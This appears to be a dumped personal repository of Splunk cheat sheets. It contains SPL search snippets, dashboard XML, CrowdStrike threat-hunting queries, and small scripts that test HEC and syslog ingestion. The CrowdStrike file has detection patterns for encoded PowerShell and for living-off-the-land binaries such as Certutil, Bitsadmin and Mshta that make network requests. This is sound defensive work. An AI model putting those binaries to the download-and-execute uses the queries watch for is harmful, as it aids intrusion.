├── LICENSE ├── README.md ├── crowdstrile-spl.md ├── dashboard-link.xml ├── fun.spl ├── helpful_regex.md ├── hidedashboardwithnoresults.xml ├── splunk-cim.spl ├── splunk-hec-check.py ├── splunk_template_view.md ├── test_syslog-ng.py ├── test_syslog.sh └── working-splunk-hec-check.py /LICENSE: -------------------------------------------------------------------------------- 1 | Creative Commons Legal Code 2 | 3 | CC0 1.0 Universal 4 | 5 | CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE 6 | LEGAL SERVICES. DISTRIBUTION OF THIS DOCUMENT DOES NOT CREATE AN 7 | ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS 8 | INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES 9 | REGARDING THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS 10 | PROVIDED HEREUNDER, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING FROM 11 | THE USE OF THIS DOCUMENT OR THE INFORMATION OR WORKS PROVIDED 12 | HEREUNDER. 13 | 14 | Statement of Purpose 15 | 16 | The laws of most jurisdictions throughout the world automatically confer 17 | exclusive Copyright and Related Rights (defined below) upon the creator 18 | and subsequent owner(s) (each and all, an "owner") of an original work of 19 | authorship and/or a database (each, a "Work"). 20 | 21 | Certain owners wish to permanently relinquish those rights to a Work for 22 | the purpose of contributing to a commons of creative, cultural and 23 | scientific works ("Commons") that the public can reliably and without fear 24 | of later claims of infringement build upon, modify, incorporate in other 25 | works, reuse and redistribute as freely as possible in any form whatsoever 26 | and for any purposes, including without limitation commercial purposes. 27 | These owners may contribute to the Commons to promote the ideal of a free 28 | culture and the further production of creative, cultural and scientific 29 | works, or to gain reputation or greater distribution for their Work in 30 | part through the use and efforts of others. 31 | 32 | For these and/or other purposes and motivations, and without any 33 | expectation of additional consideration or compensation, the person 34 | associating CC0 with a Work (the "Affirmer"), to the extent that he or she 35 | is an owner of Copyright and Related Rights in the Work, voluntarily 36 | elects to apply CC0 to the Work and publicly distribute the Work under its 37 | terms, with knowledge of his or her Copyright and Related Rights in the 38 | Work and the meaning and intended legal effect of CC0 on those rights. 39 | 40 | 1. Copyright and Related Rights. A Work made available under CC0 may be 41 | protected by copyright and related or neighboring rights ("Copyright and 42 | Related Rights"). Copyright and Related Rights include, but are not 43 | limited to, the following: 44 | 45 | i. the right to reproduce, adapt, distribute, perform, display, 46 | communicate, and translate a Work; 47 | ii. moral rights retained by the original author(s) and/or performer(s); 48 | iii. publicity and privacy rights pertaining to a person's image or 49 | likeness depicted in a Work; 50 | iv. rights protecting against unfair competition in regards to a Work, 51 | subject to the limitations in paragraph 4(a), below; 52 | v. rights protecting the extraction, dissemination, use and reuse of data 53 | in a Work; 54 | vi. database rights (such as those arising under Directive 96/9/EC of the 55 | European Parliament and of the Council of 11 March 1996 on the legal 56 | protection of databases, and under any national implementation 57 | thereof, including any amended or successor version of such 58 | directive); and 59 | vii. other similar, equivalent or corresponding rights throughout the 60 | world based on applicable law or treaty, and any national 61 | implementations thereof. 62 | 63 | 2. Waiver. To the greatest extent permitted by, but not in contravention 64 | of, applicable law, Affirmer hereby overtly, fully, permanently, 65 | irrevocably and unconditionally waives, abandons, and surrenders all of 66 | Affirmer's Copyright and Related Rights and associated claims and causes 67 | of action, whether now known or unknown (including existing as well as 68 | future claims and causes of action), in the Work (i) in all territories 69 | worldwide, (ii) for the maximum duration provided by applicable law or 70 | treaty (including future time extensions), (iii) in any current or future 71 | medium and for any number of copies, and (iv) for any purpose whatsoever, 72 | including without limitation commercial, advertising or promotional 73 | purposes (the "Waiver"). Affirmer makes the Waiver for the benefit of each 74 | member of the public at large and to the detriment of Affirmer's heirs and 75 | successors, fully intending that such Waiver shall not be subject to 76 | revocation, rescission, cancellation, termination, or any other legal or 77 | equitable action to disrupt the quiet enjoyment of the Work by the public 78 | as contemplated by Affirmer's express Statement of Purpose. 79 | 80 | 3. Public License Fallback. Should any part of the Waiver for any reason 81 | be judged legally invalid or ineffective under applicable law, then the 82 | Waiver shall be preserved to the maximum extent permitted taking into 83 | account Affirmer's express Statement of Purpose. In addition, to the 84 | extent the Waiver is so judged Affirmer hereby grants to each affected 85 | person a royalty-free, non transferable, non sublicensable, non exclusive, 86 | irrevocable and unconditional license to exercise Affirmer's Copyright and 87 | Related Rights in the Work (i) in all territories worldwide, (ii) for the 88 | maximum duration provided by applicable law or treaty (including future 89 | time extensions), (iii) in any current or future medium and for any number 90 | of copies, and (iv) for any purpose whatsoever, including without 91 | limitation commercial, advertising or promotional purposes (the 92 | "License"). The License shall be deemed effective as of the date CC0 was 93 | applied by Affirmer to the Work. Should any part of the License for any 94 | reason be judged legally invalid or ineffective under applicable law, such 95 | partial invalidity or ineffectiveness shall not invalidate the remainder 96 | of the License, and in such case Affirmer hereby affirms that he or she 97 | will not (i) exercise any of his or her remaining Copyright and Related 98 | Rights in the Work or (ii) assert any associated claims and causes of 99 | action with respect to the Work, in either case contrary to Affirmer's 100 | express Statement of Purpose. 101 | 102 | 4. Limitations and Disclaimers. 103 | 104 | a. No trademark or patent rights held by Affirmer are waived, abandoned, 105 | surrendered, licensed or otherwise affected by this document. 106 | b. Affirmer offers the Work as-is and makes no representations or 107 | warranties of any kind concerning the Work, express, implied, 108 | statutory or otherwise, including without limitation warranties of 109 | title, merchantability, fitness for a particular purpose, non 110 | infringement, or the absence of latent or other defects, accuracy, or 111 | the present or absence of errors, whether or not discoverable, all to 112 | the greatest extent permissible under applicable law. 113 | c. Affirmer disclaims responsibility for clearing rights of other persons 114 | that may apply to the Work or any use thereof, including without 115 | limitation any person's Copyright and Related Rights in the Work. 116 | Further, Affirmer disclaims responsibility for obtaining any necessary 117 | consents, permissions or other rights required for any use of the 118 | Work. 119 | d. Affirmer understands and acknowledges that Creative Commons is not a 120 | party to this document and has no duty or obligation with respect to 121 | this CC0 or use of the Work. 122 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | --- 2 | layout: page 3 | title: "Splunk Cheatsheet" 4 | permalink: /spl 5 | --- 6 | 7 | ## Splunk Quick Cheat Sheet 8 | 9 | **DNS Lookup** 10 | ``` 11 | | lookup dnslookup clientip as dest_ip OUTPUT clienthost as dest_host 12 | ``` 13 | **DNS Independent IP Resolution** 14 | ``` 15 | | inputlookup tHostInfo 16 | | search src_ip=$IPADDRESS$ OR src_host=$HOSTNAME$ 17 | ``` 18 | 19 | **Event Frequency** 20 | ``` 21 | | stats count by signature 22 | `comment("define varriables")` 23 | | eval days = 10 24 | | eval events_perShift = round(count / ((days * 24)/4),3) 25 | | eval events_perDay = round(count / days,2) 26 | | eval events_perWeek = round(count / (days / 7),2) 27 | | sort - count 28 | | fields - count days 29 | | table signature events_perShift events_perDay events_perWeek 30 | | addcoltotals labelfield=signature label=Total 31 | ``` 32 | 33 | **Get the earliest and latest time for an observed field value** 34 | ``` 35 | | stats earliest(_time) as firstTime latest(_time) as lastTime by dest 36 | | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") 37 | | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") 38 | ``` 39 | 40 | **List All Available Indexes with Events** 41 | ``` 42 | | eventcount summarize=false index=* 43 | | search count!=0 44 | | dedup index 45 | | fields - server 46 | ``` 47 | **List All Available Non-Internal Indexes with Events** 48 | ``` 49 | | eventcount summarize=false index=* 50 | | search count!=0 NOT index IN (audit_summary, cim_modactions, endpoint_summary, lastchanceindex, notable, notable_summary, risk, summary, tc_app_logs, threat_activity) 51 | | dedup index 52 | | fields - server 53 | ``` 54 | 55 | **List All Available Sourcetypes in an Index** 56 | ``` 57 | | metadata type=sourcetypes index=foo 58 | | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") 59 | | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") 60 | | eval recentTime=strftime(recentTime,"%Y-%m-%d %H:%M:%S") 61 | ``` 62 | 63 | **Better FieldSummary with Event Coverage** 64 | ``` 65 | index=pa_log sourcetype="pan:traffic" | fieldsummary 66 | | eventstats max(count) as total 67 | | eval event_coverage = round(((count / total)*100),2)."%" 68 | ``` 69 | 70 | **Lower case all fields** 71 | ``` 72 | | foreach "*" [eval <>=lower('<>') ] 73 | ``` 74 | 75 | **Make time human readable** 76 | ``` 77 | eval mytime=strftime(_time,"%Y-%m-%d %H:%M:%S") 78 | ``` 79 | 80 | **Remove Domain from Device** 81 | ``` 82 | |rex field=dest "^(?.*?)[\.|$]" 83 | ``` 84 | 85 | **Normalize User Field from WinEventlog 86 | ``` 87 | | eval user=lower(if(match(user,".*\\\\.*"), replace(user,".*\\\\",""), user)), 88 | ``` 89 | 90 | **Get current user context** 91 | ``` 92 | | rest /services/authentication/current-context splunk_server=loacal 93 | ``` 94 | 95 | **Group By Octet**
96 | ***2 Octets*** 97 | ``` 98 | | rex field=src_ip "(?\d+\.\d+)+\.\d+\.\d+" 99 | | stats count by subnet 100 | ``` 101 | ***3 Octets*** 102 | ``` 103 | | rex field=ip "(?\d+\.\d+\.\d+)\.\d+" 104 | | stats count by subnet 105 | ``` 106 | 107 | **Use of now** 108 | ``` 109 | | eval yesterday=relative_time(now(), "-1d@d") 110 | ``` 111 | 112 | **Turn a field into csv format** 113 | ``` 114 | | fields mv_foo 115 | | mvcombine mv_foo delim="," 116 | | nomv mv_foo 117 | ``` 118 | 119 | **Turn a field into csv format 2** 120 | ``` 121 | | fields mv_foo 122 | | eval mf_foo_csv = mvjoin(mv_foo,", ") 123 | ``` 124 | 125 | **Expand multivalued field** 126 | ``` 127 | | fields foo 128 | | mvcombine foo delim="," 129 | | nomv foo 130 | ``` 131 | 132 | **Sankey Multistaged**
133 | ***2 staged*** 134 | ``` 135 | | table src_ip dest_port dest_ip 136 | | appendpipe [stats count by src_ip dest_port | rename src_ip as source, dest_port as target] 137 | | appendpipe [stats count by dest_port dest_ip | rename dest_port as source, dest_ip as target] 138 | | search source=* 139 | | fields source target count 140 | ``` 141 | ***3 staged*** 142 | ``` 143 | | table src_ip signature category dest_ip 144 | | appendpipe [stats count by src_ip signature | rename src_ip as source, signature as target] 145 | | appendpipe [stats count by signature category | rename signature as source, category as target] 146 | | appendpipe [stats count by category dest_ip | rename category as source, dest_ip as target] 147 | | search source=* 148 | | fields source target count 149 | ``` 150 | 151 | **Search time in a lookup**
152 | Incident Review is used as an example 153 | ``` 154 | | inputlookup incident_review_lookup 155 | | addinfo 156 | | eval yesterday=relative_time(now(), "-1d@d") 157 | | where (time >= yesterday AND time <= info_max_time) 158 | ``` 159 | 160 | **Find hosts that haven not checked in in a specified amount of time** 161 | ``` 162 | | stats latest(_time) as lastTime earliest(_time) as firstTime by hostnames 163 | `comment("change the "-30d" to choose a date that we haven't seen assets check in by")` 164 | | eval recent = if(lastTime > relative_time(now(),"-30d"),1,0), realLatest = strftime(latest,"%c") 165 | | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") 166 | | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") 167 | | where recent=0 168 | ``` 169 | 170 | **Join** 171 | ``` 172 | search | join type=inner 173 | | join type=left max=0  174 | | join type=inner overwrite=false genre_id 175 | [| {​​​search}​​​​​​​​​​ | rename id as genre_id ] 176 | ``` 177 | 178 | **CPE Extraction** 179 | ``` 180 | .... spl filtering 181 | | dedup agent_names 182 | | fields installed_software{} agent_names sourcetype 183 | | rename installed_software{} as installed_software 184 | | mvexpand installed_software 185 | | eval installed_software1 = split(installed_software,":") 186 | | eval vendor = mvindex(installed_software1,2) 187 | | eval product = mvindex(installed_software1,3) 188 | | eval version = mvindex(installed_software1,4) 189 | | eval service_pack = mvindex(installed_software1,5) 190 | | rename installed_software as cpe 191 | | table agent_names product vendor version service_pack cpe 192 | ``` 193 | -------------------------------------------------------------------------------- /crowdstrile-spl.md: -------------------------------------------------------------------------------- 1 | 2 | ## DNS Record Lookup 3 | `sourcetype=DnsRequestV4* DomainName= ` 4 | 5 | ## CrowdStrike search for meainingful User logins 6 | ``` 7 | index=main ComputerName=* sourcetype="UserLogonV8-v02" 8 | NOT UserName IN ("DWM*","UMFD*") 9 | NOT LogonType_decimal IN (0,5) 10 | | eval logon_type = case(LogonType_decimal==2,"Interactive", 11 | LogonType_decimal==3,"Network", 12 | LogonType_decimal==4,"BATCH", 13 | LogonType_decimal==5,"service", 14 | LogonType_decimal==6,"Proxy", 15 | LogonType_decimal==7,"Unlock", 16 | LogonType_decimal==8,"Network_Clearatext", 17 | LogonType_decimal==9,"New_credentials", 18 | LogonType_decimal==10,"Remote Interfactive", 19 | LogonType_decimal==11,"cached_interactive", 20 | LogonType_decimal==12,"cached_remote_interactive", 21 | LogonType_decimal==13,"Cached_unlock", 22 | 1==1,"error") 23 | | eval IP4 = coalesce(RemoteAddressIP4, LocalAddressIP4) 24 | | table _time UserName logon_type IP4 ComputerName 25 | ``` 26 | 27 | ## Encoded PowerShell 28 | `event_simpleName=ProcessRollup2 FileName=powershell.exe CommandLine IN (*-enc*,*encoded*)` 29 | 30 | ## Improper Local System Account Usage 31 | `event_simpleName="ProcessRollup2" FileName IN (w3wp.exe,sqlservr.exe,httpd.exe,nginx.exe) UserName="LOCAL SYSTEM"` 32 | 33 | ## Renamed Executable Execution 34 | `event_simpleName="NewExecutableRenamed" 35 | | rename TargetFileName as ImageFileName 36 | | join ImageFileName 37 | [ search event_simpleName="ProcessRollup2" ] 38 | | table ComputerName SourceFileName ImageFileName CommandLine` 39 | 40 | ## LOL Binaries with Network 41 | `event_simpleName="DnsRequest" 42 | | rename ContextProcessId as TargetProcessId 43 | | join TargetProcessId 44 | [ search event_simpleName="ProcessRollup2" FileName IN (Atbroker.exe , Bash.exe , Bitsadmin.exe , Certutil.exe , Cmd.exe , Cmstp.exe , Control.exe , Cscript.exe , Csc.exe , Dfsvc.exe , Diskshadow.exe , Dnscmd.exe , Esentutl.exe , Eventvwr.exe , Expand.exe , Extexport.exe , Extrac32.exe , Findstr.exe , Forfiles.exe , Ftp.exe , Gpscript.exe , Hh.exe , Ie4uinit.exe , Ieexec.exe , Infdefaultinstall.exe , Installutil.exe , Jsc.exe , Makecab.exe , Mavinject.exe , Mmc.exe , Msconfig.exe , Msdt.exe , Mshta.exe , Msiexec.exe , Odbcconf.exe , Pcalua.exe , Pcwrun.exe , Presentationhost.exe , Print.exe , Regasm.exe , Regedit.exe , Register-cimprovider.exe , Regsvcs.exe , Regsvr32.exe , Reg.exe , Replace.exe , Rpcping.exe , Rundll32.exe , Runonce.exe , Runscripthelper.exe , Schtasks.exe , Scriptrunner.exe , Sc.exe , SyncAppvPublishingServer.exe , Verclsid.exe , Wab.exe , Wmic.exe , Wscript.exe , Wsreset.exe , Xwizard.exe) ] 45 | 46 | # Static Behavior Model 47 | ``` 48 | event_simpleName=ProcessRollup2 49 | | join aid TargetProcessId_decimal 50 | [search DetectName=SuspiciousFileWindows] 51 | | eval ProcessStartTime=ProcessStartTime_decimal 52 | | eval ProcessStartTime=strftime(ProcessStartTime,"%m/%d/%y %H:%M:%S") 53 | | table ProcessStartTime aid ComputerName UserName ImageFileName OriginalFilename SHA256HashData ParentBaseFileName 54 | ``` 55 | -------------------------------------------------------------------------------- /dashboard-link.xml: -------------------------------------------------------------------------------- 1 | 2 | foo 3 | 4 |
5 | 6 | 7 |

Header

8 | 9 | 10 |
11 | 12 | 13 | -------------------------------------------------------------------------------- /fun.spl: -------------------------------------------------------------------------------- 1 | `comment("fun severity")` 2 | | eval severity = case( 3 | severity="Critical", "┻━┻︵ \(°□°)/ ︵ ┻━┻ ".severity, 4 | severity="High", "(╯°□°)╯ ︵ ┻━┻ ".severity, 5 | severity="Medium", "ಠ_ಠ ".severity, 6 | severity="Low", "(っ◕‿◕)っ ".severity, 7 | severity="Informational", "♥‿♥ ".severity, 8 | true(), severity 9 | ) 10 | -------------------------------------------------------------------------------- /helpful_regex.md: -------------------------------------------------------------------------------- 1 | 2 | # Asset Related Information 3 | Pull IPv4 - "(?([0-9]{1,3}\.){3}[0-9]{1,3}$)" 4 | -------------------------------------------------------------------------------- /hidedashboardwithnoresults.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | sourcetype=* 5 | 6 | 7 | 8 | 9 | 10 | true 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /splunk-cim.spl: -------------------------------------------------------------------------------- 1 | 2 | ###Report find all indexes to whitelist based on available tags 3 | index=* tag IN (authentication,alert,certificate,change,database,dlp,email,ids,attack,inventory,malware,attack,operations,network,resolution,dns,session,communicate,performance,report,vulnerabilities,update,status,web) 4 | | stats values(index) as index by tag 5 | -------------------------------------------------------------------------------- /splunk-hec-check.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | ## define your varriables 4 | # channel is HEC token 5 | channel = input("Input Token: ") 6 | # company's hostname 7 | company = input("Input Company Hostname: ") 8 | # http or https 9 | protocol = input("Choose Protocol: ") 10 | # cloud customers have `http-inputs-` before hostname 11 | host = "http-inputs-" + company + ".splunkcloud.com" 12 | # endpoint = collector or collector/raw 13 | endpoint = "/services/collector" 14 | 15 | # generated url 16 | url = protocol + "://" + host + endpoint 17 | 18 | params = { 19 | "channel": channel 20 | } 21 | 22 | headers = { 23 | "Authorization": "Splunk {}".format(channel) 24 | } 25 | 26 | # verify=False if invalid cert 27 | r = requests.post(url, params=params, headers=headers) 28 | 29 | # you should recieve '{"text":"No data","code":5}' if inputs are working 30 | print(r.text) 31 | -------------------------------------------------------------------------------- /splunk_template_view.md: -------------------------------------------------------------------------------- 1 |
2 | 3 | I frequently find my self trying to remember what is required for a new view creation. 4 |
5 | 6 | 7 | 8 | -24h@h 9 | now 10 | 11 | 12 |
13 |
14 | -------------------------------------------------------------------------------- /test_syslog-ng.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/python3 2 | # simple script to test a syslog-ng input. 3 | import socket 4 | 5 | dest_ip = input("Input the IP of the Syslog-ng Server: ") 6 | dest_port = int(input("Input the port for Syslog-ng ingestion: ")) 7 | hostname = socket.gethostname() 8 | message = input("Message (Optional): ") 9 | 10 | content = f'<14>Test Syslog-ng pipeline over {dest_port} to {dest_ip} from {hostname}. \"message\":\"{message}\" ' 11 | 12 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 | s.connect((dest_ip, dest_port)) 14 | s.send(content.encode()) 15 | 16 | s.close() 17 | 18 | print("Sent message:", content) 19 | -------------------------------------------------------------------------------- /test_syslog.sh: -------------------------------------------------------------------------------- 1 | # echo "‘"<14>_sourcehost_ messagetext"’" | nc -v 2 | echo "Input destination IP or hostname: " 3 | read dest 4 | echo "Input destination port: " 5 | read dest_port 6 | echo "<14>localhost testing syslog-ng" | nc -v dest dest_port 7 | -------------------------------------------------------------------------------- /working-splunk-hec-check.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | ## define your varriables 4 | # channel is HEC token 5 | channel = input("Input HEC Token: ") 6 | # company's hostname 7 | company = input("Input companys Splunk Cloud Hostname: ") 8 | # http or https 9 | protocol = "https" 10 | # cloud customers have `http-inputs-` before hostname 11 | host = "http-inputs-" + company + ".splunkcloud.com" 12 | # endpoint = collector or collector/raw 13 | endpoint = "/services/collector" 14 | 15 | # generated url 16 | url = protocol + "://" + host + endpoint 17 | 18 | params = { 19 | "channel": channel 20 | } 21 | 22 | headers = { 23 | "Authorization": f'Splunk {channel}' 24 | } 25 | 26 | # verify=False if invalid cert 27 | r = requests.post(url, params=params, headers=headers) 28 | 29 | print( 30 | 'You should recieve \'{"text":"No data","code":5}\' if inputs are working.') 31 | print('Result:', r.text) 32 | --------------------------------------------------------------------------------